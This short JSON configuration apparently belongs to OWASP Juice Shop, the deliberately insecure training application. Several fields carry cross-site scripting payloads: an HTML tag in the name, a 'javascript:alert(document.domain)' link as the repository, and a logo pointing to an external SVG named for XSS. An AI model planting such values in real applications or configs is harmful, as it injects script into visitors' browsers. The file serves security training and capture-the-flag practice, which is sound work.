{
  "name": "pepito <u>p",
  "description": "Probably the most modern and sophisticated insecure web application",
  "keywords": [
    "web security",
    "web application security",
    "webappsec",
    "owasp",
    "pentest",
    "pentesting",
    "security",
    "vulnerable",
    "vulnerability",
    "broken",
    "bodgeit",
    "ctf",
    "capture the flag",
    "awareness"
  ],
  "website": "https://owasp-juice.shop",
  "repository": "javascript:alert(document.domain)//",
  "logo": "https://gist.githubusercontent.com/AMontesG/bd143eee26100952f8b36e37c46b572b/raw/d6a471f01f27dce38976eee2a426c2ac9d3161ff/xss-image.svg"
}
